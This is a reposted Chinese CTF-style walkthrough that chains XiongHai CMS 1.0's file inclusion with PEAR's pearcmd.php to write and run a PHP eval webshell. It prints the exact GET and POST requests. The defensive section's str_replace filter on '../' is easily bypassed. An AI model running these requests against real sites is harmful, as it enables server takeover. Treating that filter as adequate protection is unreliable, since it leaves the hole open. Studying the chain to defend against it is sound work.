当前位置: 首页 > news >正文

CTF实战:熊海CMS 1.0的另类利用——绕过文件上传限制,用Pearcmd.php实现RCE的完整流程

news 2026/5/21 20:48:40

CTF实战:熊海CMS 1.0的另类利用——绕过文件上传限制,用Pearcmd.php实现RCE的完整流程

在渗透测试和CTF竞赛中,面对老旧CMS系统时,常规漏洞往往已被修复或限制。本文将深入探讨如何通过非传统路径,利用PHP的Pear扩展实现远程代码执行(RCE),为安全研究人员提供一种全新的攻击思路。

1. 熊海CMS漏洞背景分析

熊海CMS 1.0是一个存在多个已知漏洞的内容管理系统,常见攻击路径包括:

  • 后台越权登录(通过修改cookie或弱口令)
  • SQL注入漏洞(在/admin/?r=login路径)
  • 文件包含漏洞(通过/?r=参数)
  • 存储型XSS和CSRF漏洞

关键限制条件

  1. 文件上传功能被严格限制,常规webshell上传无法成功
  2. 部分关键文件(如/proc/1/environ)权限受限,无法直接读取
  3. 自动添加.php后缀的文件包含机制

提示:在渗透测试中,当常规路径受阻时,需要关注系统组件和依赖项的非常规利用方式。

2. Pearcmd.php利用原理

PHP的PEAR(PHP Extension and Application Repository)是一个代码库和分发系统,其核心文件pearcmd.php在某些配置下可能成为攻击入口。

2.1 利用条件检查

要实现通过pearcmd.php的RCE,需要满足以下条件:

条件检查方法默认状态
Pear扩展已安装检查/usr/share/php/pearcmd.php是否存在通常安装
register_argc_argv=Onphpinfo()查看或尝试传递参数默认为Off
文件包含点可用测试包含无害文件依赖具体系统
可预测pear路径尝试常见安装位置/usr/share/php/

2.2 config-create命令特性

pearcmd.php的config-create命令可以将输入内容写入指定文件:

php /usr/share/php/pearcmd.php config-create /任意内容 目标文件路径

这个特性允许攻击者:

  1. 创建新的配置文件
  2. 在配置文件中注入PHP代码
  3. 通过文件包含执行该配置文件

3. 完整利用流程

3.1 路径探测与验证

首先需要确认pearcmd.php的实际位置,常见路径包括:

  • /usr/local/lib/php/pearcmd.php
  • /usr/share/php/pearcmd.php
  • /usr/share/pear/pearcmd.php

在熊海CMS中,可以通过文件包含漏洞测试这些路径:

/?r=../../../../../../usr/share/php/pear

3.2 绕过文件后缀限制

熊海CMS的文件包含会自动添加.php后缀,因此需要:

  1. 去掉pearcmd.php的.php后缀
  2. 使用足够多的../返回根目录

有效路径构造示例:

/?r=../../../../../../../../usr/share/php/pearcmd

3.3 Payload构造与执行

完整的攻击payload需要:

  1. 使用+作为参数分隔符(而非&)
  2. 通过config-create命令写入webshell
  3. 指定可写的临时目录
GET /?+config-create+/&r=../../../../../../../../usr/share/php/pearcmd&/<?=@eval($_POST['cmd']);?>+/tmp/webshell.php HTTP/1.1 Host: target.com

关键参数说明:

  • +config-create+:执行的命令
  • /&r=...:文件包含路径
  • <?=@eval($_POST['cmd']);?>:写入的PHP代码
  • /tmp/webshell.php:写入的目标路径

3.4 Webshell访问与利用

成功执行后,webshell将写入/tmp/webshell.php,访问时需注意:

  1. 系统可能自动添加.php后缀
  2. 需要使用原始包含路径访问
POST /?r=../../../../../../../../tmp/webshell HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded cmd=system('id');

4. 防御建议与缓解措施

针对此类攻击,管理员可以采取以下防护措施:

  1. 禁用危险配置

    register_argc_argv = Off allow_url_include = Off

  2. 文件包含防护

    • 限制包含文件路径
    • 禁用动态包含

  3. 系统加固

    • 移除不必要的pearcmd.php
    • 限制/tmp目录执行权限

  4. 输入验证

    $file = str_replace(array('../', '..\\'), '', $_GET['r']);

这种利用方式展示了在渗透测试中"迂回攻击"的重要性。当直接漏洞不可用时,通过组合系统组件特性往往能开辟新的攻击路径。理解底层机制是成为高级安全研究员的关键。

http://www.jsqmd.com/news/860175/

相关文章:

  • 对比直接使用官方 API,通过 Taotoken 调用在成本透明度上的提升体验
  • 抖音批量下载终极指南:如何用开源工具高效采集视频素材
  • 程序员需求攀升:数字化浪潮下的行业必然
  • VR安全带防坠落体验平台助力高空作业安全培训
  • Firefox 148默认禁用asm.js优化,Web性能开创性技术实验落幕
  • 从HTTP/1.0到HTTP/3:聊聊那些年我们踩过的‘连接’坑,以及性能优化实战
  • 从TEC4模型机运算器实验,看懂CPU数据通路与ALU工作的底层逻辑
  • 工厂实验室建设公司厂家:建不好,产品质量白搞|中南实验室建设
  • 初创团队如何利用Taotoken统一管理多个AI项目的API成本与用量
  • 智慧职教刷课脚本:3分钟实现全平台自动学习的终极指南
  • 2026 高炉炼铁智能化技术全景与演进路径~系列文章00:高炉炼铁智能化的产业变革与2026技术全景
  • PP喷淋塔厂家选购指南:2026如何选到靠谱供应商 - 资讯纵览
  • AI智能体自进化革命:SkillOS让AI越用越聪明
  • linux编译系统工作流程及其原理
  • 非标设备物料编码:从分类到维护的 8 个关键步骤
  • AI代码涌入PyPI:数量激增、质量堪忧,生态安全面临严峻挑战
  • 如何5分钟搭建网盘直链解析服务:高效下载解决方案完全指南
  • 软件开发行业的发展:从单体架构到微服务架构的演变历程
  • 3分钟快速上手:B站视频转文字工具bili2text的完整指南
  • 小资金期货量化用什么软件:成本敏感型的现实选项
  • 自贸港封关TPO5三亚企业税务咨询合作机构参考清单 - 资讯纵览
  • DellFanManagement:重新定义戴尔笔记本风扇控制的智能革命
  • 波兰语电商短视频配音效率提升300%,ElevenLabs批量生成+SSML动态变调+自动标点停顿优化全流程
  • 2026年吸油过滤袋深度测评:从3个方面教你如何为工业场景匹配最佳方案 - 资讯纵览
  • 别再为多设备同步发愁了!手把手教你用NI-DAQmx的‘通道扩展’功能搞定多机箱数据采集
  • FEC AFC1500 SAN4-40M 电动伺服驱动控制器
  • Java开发者专属!收藏这份AgentScope Java指南,轻松入门大模型开发
  • KEIL 4.74安装包国内下载太慢?试试这个备选方案与完整激活验证流程
  • QrazyBox:3步拯救损坏二维码的终极指南,让模糊QR码重获新生
  • 海南跨境 电商企业税务咨询优选机构TOP5盘点 - 资讯纵览